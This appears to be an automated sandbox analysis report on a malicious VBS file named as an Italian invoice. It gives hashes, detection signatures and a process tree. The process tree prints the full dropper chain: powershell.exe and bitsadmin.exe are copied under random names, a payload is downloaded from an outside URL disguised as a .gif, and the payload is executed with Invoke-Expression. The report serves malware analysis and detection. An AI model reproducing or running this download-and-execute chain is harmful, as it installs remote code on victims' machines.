Analysis
-
max time kernel
32s -
max time network
123s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
30-06-2020 11:36
Static task
static1
Behavioral task
behavioral1
Sample
FattDiffEmessa2020 03799870369.vbs
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
FattDiffEmessa2020 03799870369.vbs
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
FattDiffEmessa2020 03799870369.vbs
-
Size
3KB
-
MD5
ba1697038db097aae963962a1fd5dd15
-
SHA1
46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
-
SHA256
79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
-
SHA512
d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WScript.exedescription pid process target process PID 1356 wrote to memory of 1444 1356 WScript.exe cmd.exe PID 1356 wrote to memory of 1444 1356 WScript.exe cmd.exe PID 1356 wrote to memory of 1444 1356 WScript.exe cmd.exe PID 1356 wrote to memory of 1000 1356 WScript.exe cmd.exe PID 1356 wrote to memory of 1000 1356 WScript.exe cmd.exe PID 1356 wrote to memory of 1000 1356 WScript.exe cmd.exe PID 1356 wrote to memory of 744 1356 WScript.exe DrBqNtd.exe PID 1356 wrote to memory of 744 1356 WScript.exe DrBqNtd.exe PID 1356 wrote to memory of 744 1356 WScript.exe DrBqNtd.exe PID 1356 wrote to memory of 744 1356 WScript.exe DrBqNtd.exe PID 1356 wrote to memory of 1780 1356 WScript.exe pDrBqNtd.exe PID 1356 wrote to memory of 1780 1356 WScript.exe pDrBqNtd.exe PID 1356 wrote to memory of 1780 1356 WScript.exe pDrBqNtd.exe PID 1356 wrote to memory of 1780 1356 WScript.exe pDrBqNtd.exe -
Executes dropped EXE 2 IoCs
Processes:
DrBqNtd.exepDrBqNtd.exepid process 744 DrBqNtd.exe 1780 pDrBqNtd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
pDrBqNtd.exedescription pid process Token: SeDebugPrivilege 1780 pDrBqNtd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pDrBqNtd.exepid process 1780 pDrBqNtd.exe 1780 pDrBqNtd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe2⤵
-
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe"C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe"C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe" -c &{$aO=gc C:\Users\Admin\AppData\Roaming\it.gif| Out-String; Invoke-Expression $aO }2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
-
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
-
C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
-
C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
-
memory/744-3-0x0000000000000000-mapping.dmp
-
memory/1000-1-0x0000000000000000-mapping.dmp
-
memory/1356-10-0x00000000025D0000-0x00000000025D4000-memory.dmpFilesize
16KB
-
memory/1444-0-0x0000000000000000-mapping.dmp
-
memory/1780-6-0x0000000000000000-mapping.dmp